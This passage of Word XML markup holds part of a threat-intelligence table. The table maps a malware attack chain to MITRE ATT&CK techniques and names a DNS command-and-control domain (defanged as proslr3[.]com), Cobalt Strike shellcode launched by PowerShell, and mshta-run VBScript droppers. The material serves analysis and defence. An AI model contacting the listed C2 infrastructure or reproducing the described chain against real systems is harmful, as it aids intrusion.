              <w:t>The shellcode retrieves an additional payload by connecting to the following C2 server using DNS:</w:t>
            </w:r>
            <w:r w:rsidR="00C91DAD">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidR="00C91DAD" w:rsidRPr="00C91DAD">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>aaa.stage</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidR="00C91DAD" w:rsidRPr="00C91DAD">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>.14919005.www1.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="65A0F1AF" w14:textId="06364EC5" w:rsidR="00361502" w:rsidRPr="00B857D7" w:rsidRDefault="00C91DAD" w:rsidP="004F28B4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidRPr="00C91DAD">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>proslr3[.]com</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006D3412" w:rsidRPr="00B857D7" w14:paraId="2E8D8951" w14:textId="77777777" w:rsidTr="00794624">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="15469B64" w14:textId="4487C68E" w:rsidR="004F28B4" w:rsidRDefault="00C91DAD" w:rsidP="004F28B4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>15</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="50C41B0D" w14:textId="3D0C93F7" w:rsidR="004F28B4" w:rsidRPr="0067433A" w:rsidRDefault="004F28B4" w:rsidP="004F28B4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0067433A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0067433A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0011 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0067433A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Command &amp; Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2333" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0E4EA5C1" w14:textId="5C06C603" w:rsidR="004F28B4" w:rsidRPr="0067433A" w:rsidRDefault="00C91DAD" w:rsidP="004F28B4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00C91DAD">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1071.004 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00C91DAD">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> &lt;Application Layer Protocol&gt;:DNS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7A39A365" w14:textId="3A889499" w:rsidR="004F28B4" w:rsidRDefault="00C91DAD" w:rsidP="004F28B4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>14</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1450FABC" w14:textId="77777777" w:rsidR="004F28B4" w:rsidRPr="00B857D7" w:rsidRDefault="004F28B4" w:rsidP="004F28B4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2F7980BB" w14:textId="36D4835E" w:rsidR="004F28B4" w:rsidRPr="00B857D7" w:rsidRDefault="004F28B4" w:rsidP="004F28B4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1010" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="103E4212" w14:textId="4BDA065C" w:rsidR="004F28B4" w:rsidRPr="00B857D7" w:rsidRDefault="00C91DAD" w:rsidP="004F28B4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3632" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3F796110" w14:textId="6EEF3E19" w:rsidR="004F28B4" w:rsidRPr="00B857D7" w:rsidRDefault="00C91DAD" w:rsidP="004F28B4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>[1] See above</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006D3412" w:rsidRPr="00B857D7" w14:paraId="219EB56E" w14:textId="77777777" w:rsidTr="00794624">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1263728A" w14:textId="4204B06D" w:rsidR="004F28B4" w:rsidRDefault="00C91DAD" w:rsidP="004F28B4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>16</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0C2DD86D" w14:textId="2DCA67C4" w:rsidR="004F28B4" w:rsidRPr="00B857D7" w:rsidRDefault="004F28B4" w:rsidP="004F28B4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0067433A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>TA</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0067433A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>0011 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0067433A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Command &amp; Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2333" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="55D47B3A" w14:textId="77983CC7" w:rsidR="004F28B4" w:rsidRPr="00B857D7" w:rsidRDefault="004F28B4" w:rsidP="004F28B4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0067433A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="0067433A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1105 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0067433A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Ingress Tool Transfer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="538851A9" w14:textId="7BEE479C" w:rsidR="004F28B4" w:rsidRDefault="00C91DAD" w:rsidP="004F28B4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>15</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5FA7E9B3" w14:textId="77777777" w:rsidR="004F28B4" w:rsidRPr="00B857D7" w:rsidRDefault="004F28B4" w:rsidP="004F28B4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="31DF4C05" w14:textId="11C0784E" w:rsidR="004F28B4" w:rsidRPr="00B857D7" w:rsidRDefault="004F28B4" w:rsidP="004F28B4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1010" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2FB1A852" w14:textId="6CD86E88" w:rsidR="004F28B4" w:rsidRPr="00B857D7" w:rsidRDefault="00C91DAD" w:rsidP="004F28B4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3632" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4D932928" w14:textId="1329DDDC" w:rsidR="004F28B4" w:rsidRPr="00B857D7" w:rsidRDefault="00C91DAD" w:rsidP="004F28B4">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00487DB2" w:rsidRPr="00B857D7" w14:paraId="17D8AA8B" w14:textId="77777777" w:rsidTr="003241F8">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5393FF19" w14:textId="75E9DD0A" w:rsidR="00487DB2" w:rsidRDefault="00487DB2" w:rsidP="003241F8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>17</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6FAE4AC1" w14:textId="77777777" w:rsidR="00487DB2" w:rsidRPr="0067433A" w:rsidRDefault="00487DB2" w:rsidP="003241F8">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0C76C4CE" w14:textId="77777777" w:rsidR="00487DB2" w:rsidRPr="008B3AF0" w:rsidRDefault="00487DB2" w:rsidP="003241F8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00031F26">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00031F26">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1059</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="0067433A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="0067433A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00031F26">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Command and Scripting Interpreter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4368BB86" w14:textId="33D3A55B" w:rsidR="00487DB2" w:rsidRDefault="00487DB2" w:rsidP="003241F8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>16</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="23EECF5C" w14:textId="77777777" w:rsidR="00487DB2" w:rsidRPr="00B857D7" w:rsidRDefault="00487DB2" w:rsidP="003241F8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1B95C16F" w14:textId="77777777" w:rsidR="00487DB2" w:rsidRDefault="00487DB2" w:rsidP="003241F8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1010" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5B2A7DF7" w14:textId="77777777" w:rsidR="00487DB2" w:rsidRPr="00B857D7" w:rsidRDefault="00487DB2" w:rsidP="003241F8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>NP-EXE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3632" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="082F40E1" w14:textId="1A335F87" w:rsidR="00487DB2" w:rsidRPr="00B857D7" w:rsidRDefault="00487DB2" w:rsidP="003241F8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:r w:rsidRPr="00487DB2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Once a successful reply is received from the command and control (C2) server, the PowerShell script executes the embedded Cobalt Strike shellcode.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00487DB2" w:rsidRPr="00B857D7" w14:paraId="54D205A1" w14:textId="77777777" w:rsidTr="003241F8">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3281128D" w14:textId="2E8A793D" w:rsidR="00487DB2" w:rsidRDefault="00487DB2" w:rsidP="003241F8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>18</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1260" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1CB18C9D" w14:textId="77777777" w:rsidR="00487DB2" w:rsidRPr="00B857D7" w:rsidRDefault="00487DB2" w:rsidP="003241F8">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333" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="626C2379" w14:textId="77777777" w:rsidR="00487DB2" w:rsidRPr="0067433A" w:rsidRDefault="00487DB2" w:rsidP="003241F8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00067DF9">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1218.005</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00067DF9">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve">System Binary Proxy Execution: </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00067DF9">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Mshta</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="635" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6999BAE3" w14:textId="120B69B2" w:rsidR="00487DB2" w:rsidRDefault="00487DB2" w:rsidP="003241F8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>17</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="591" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="49A37FD0" w14:textId="77777777" w:rsidR="00487DB2" w:rsidRPr="00B857D7" w:rsidRDefault="00487DB2" w:rsidP="003241F8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="555" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="206B373D" w14:textId="77777777" w:rsidR="00487DB2" w:rsidRDefault="00487DB2" w:rsidP="003241F8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1010" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4C32EF7C" w14:textId="77777777" w:rsidR="00487DB2" w:rsidRPr="00B857D7" w:rsidRDefault="00487DB2" w:rsidP="003241F8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>NP-EXE/IF-DEV</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3632" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2AAD48E3" w14:textId="7607DBF1" w:rsidR="00487DB2" w:rsidRPr="00B857D7" w:rsidRDefault="00487DB2" w:rsidP="003241F8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve">[1] </w:t>
            </w:r>
            <w:r w:rsidRPr="00487DB2">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>“mshta.exe” further executes the second VBScript “58d2a83f777908.23270411.vbs”, which creates a folder by GUID name inside “Intel” and drops the VBScript payloads and configuration files:</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00487DB2" w:rsidRPr="00B857D7" w14:paraId="6789887B" w14:textId="77777777" w:rsidTr="003241F8">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="182ED12D" w14:textId="1534DC88" w:rsidR="00487DB2" w:rsidRDefault="00487DB2" w:rsidP="003241F8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
